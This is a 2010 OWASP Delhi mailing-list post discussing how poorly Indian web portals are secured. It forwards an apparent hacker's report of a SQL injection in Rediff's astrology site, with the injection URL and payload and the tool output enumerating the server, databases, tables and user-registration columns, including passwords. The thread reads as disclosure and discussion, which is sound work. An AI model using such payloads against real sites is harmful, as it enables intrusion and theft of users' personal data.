[Owasp-delhi] Rediff Astrology

Sripathi Krishnan sripathi.krishnan at gmail.com
Mon Jun 14 13:55:23 EDT 2010


Its not just rediff.com, almost all other Indian portals - in.com,
indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL Injection,
Poor password/session management, open redirects .. the list is endless.

I have written to each of the above portals several times in the past year,
and have given up. IMHO, they are not interested in securing their websites.

--Sri


On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:

>  Another one to notify Rediff that readers’ daily fortune can be fixed by
> someone…Seems Rediff needs a lot of OWASP, do inform them that its free!!
>
>
>
> *From:* “Jack H4xor”
> *Sent:* 14 June 2010 12:07
> *To:* dhruv.soi at owasp.org
> *Subject:* Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
>
>
> ********************************************************************
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> +     -==  MSSQL Information Schema astrology.rediff.com  ==-     +
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> [ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
>
>
> diac=Scorpiox'
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
> [ + ] Displaying information about MSSQL host !
>
> [ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
>
>                         Aug  6 2000 00:57:48
>                         Copyright (c) 1988-2000 Microsoft Corporation
>                         Standard Edition on Windows NT 5.0 (Build 2195: Service
> Pack 4)
>
> [ + ] USER ()          : dbo
>
> [ + ] S_USER ()        : astrology
> [ + ] DB_NAME ()       : astro
> [ + ] HOST_NAME ()     : ASTROLOGY
> [ + ] SERVER_NAME ()   : SEARCHDB
> [ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
> [ + ] X-POWERED-By ()  : ASP.NET
>
> [ + ] IP_ADDRESS_INFO  : 202.54.124.173
>
>
> [ - ] We Can't get number of Databases !
>
>
> [ ! ] Start dumping database Names !
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
>
> [ DATABASE: 0 ]        : astro
>
> [ DATABASE: 1 ]        : master
>
>
> [ DATABASE: 2 ]        : tempdb
>
>
> [ DATABASE: 3 ]        : model
>
>
> [ DATABASE: 4 ]        : msdb
>
>
> [ DATABASE: 5 ]        : pubs
>
>
> [ DATABASE: 6 ]        : Northwind
>
>
> [ DATABASE: 7 ]        : travel
>
>
> [ DATABASE: 8 ]        : travel_int
>
>
> [ DATABASE: 9 ]        : astro
>
>
> [ DATABASE: 10 ]        : Jobsearch
>
>
> [ DATABASE: 11 ]        : astroyogiD
>
>
> [ DATABASE: 12 ]        : matrimonial
>
>
> [ DATABASE: 13 ]        : investornew
>
>
> [ DATABASE: 14 ]        : test
>
>
>
> [ ! ] Vulnerability Database is   :  astro
>
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
>
> [ + ] Specify Numbers   :> 200
>
>
>
> [ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION
>
> [ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER
>
>
> [ TABLES: 2 ]          : astrolove
>
>
> [ TABLES: 3 ]          : astroparent
>
>
> [ TABLES: 4 ]          : CITY
>
>
> [ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL
>
>
> [ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL
>
>
> [ TABLES: 7 ]          : COUNTRY
>
>
> [ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS
>
>
> [ TABLES: 9 ]          : CUSTOMER_CARE_MASTER
>
>
> [ TABLES: 10 ]          : CUSTOMER_PERSON1
>
>
> [ TABLES: 11 ]          : CUSTOMER_PERSON2
>
>
> [ TABLES: 12 ]          : CUSTOMER_PERSON3
>
>
> [ TABLES: 13 ]          : darshtest
>
>
> [ TABLES: 14 ]          : dtproperties
>
>
> [ TABLES: 15 ]          : FENGSHUI
>
>
> [ TABLES: 16 ]          : FRANCHISEE_MASTER
>
>
> [ TABLES: 17 ]          : idealmate
>
>
> [ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER
>
>
> [ TABLES: 19 ]          : NUMEROLOGY
>
>
> [ TABLES: 20 ]          : ORDER_DETAILS
>
>
> [ TABLES: 21 ]          : ORDER_MASTER
>
>
> [ TABLES: 22 ]          : ORDER_REMARKS
>
>
> [ TABLES: 23 ]          : ORDERS
>
>
> [ TABLES: 24 ]          : p1
>
>
> [ TABLES: 25 ]          : p3master
>
>
> [ TABLES: 26 ]          : PALMISTRY
>
>
> [ TABLES: 27 ]          : PAYMENT_METHOD_MASTER
>
>
> [ TABLES: 28 ]          : PROBLEM_ANSWER
>
>
> [ TABLES: 29 ]          : PROBLEM_CATEGORY
>
>
> [ TABLES: 30 ]          : REGISTRATION
>
>
> [ TABLES: 31 ]          : SHIPPING_DETAILS
>
>
> [ TABLES: 32 ]          : SPCFIC_ANLYS
>
>
> [ TABLES: 33 ]          : SUBSCRIBER_DETAILS
>
>
> [ TABLES: 34 ]          : SUBSCRIBER_MASTER
>
>
> [ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION
>
>
> [ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION
>
>
> [ TABLES: 37 ]          : SUBSCRIPTION_DETAILS
>
>
> [ TABLES: 38 ]          : SUBSCRIPTION_MASTER
>
>
> [ TABLES: 39 ]          : sysconstraints
>
>
> [ TABLES: 40 ]          : syssegments
>
>
> [ TABLES: 41 ]          : test
>
>
> [ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
>
> [ TABLES: 43 ]          : zodiac
>
>
>
> [ + ] Done !
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
>
> [ ? ] Numbers of Columns To Display ?
>
>
> [ + ] Specify Numbers    :> 50
>
>
>
> [ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro
>
>
>
> [ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID
>
> [ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID
>
>
> [ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS
>
>
> [ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY
>
>
> [ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE
>
>
> [ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE
>
>
> [ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR
>
>
> [ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES
>
>
> [ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO
>
>
> [ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY
>
>
> [ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE
>
>
> [ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID
>
>
> [ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME
>
>
> [ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER
>
>
> [ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID
>
>
> [ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP
>
>
> [ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME
>
>
> [ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD
>
>
> [ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO
>
>
> [ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME
>
>
>
> [ ! ] Done !
>
>
> [ ! ] All information was recorded in astrology.rediff.com.txt file !
>
>
>
> [ 1 ] : Return to Tables  !
>
> [ 2 ] : Return to Columns !
>
>
>
> [ ? ] : Oprion :>
>
>
>
> Thanks & Regards
> Jackh4xor
> ( h4cky0u )
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100614/ea8dcc7f/attachment-0001.html 


More information about the Owasp-delhi mailing list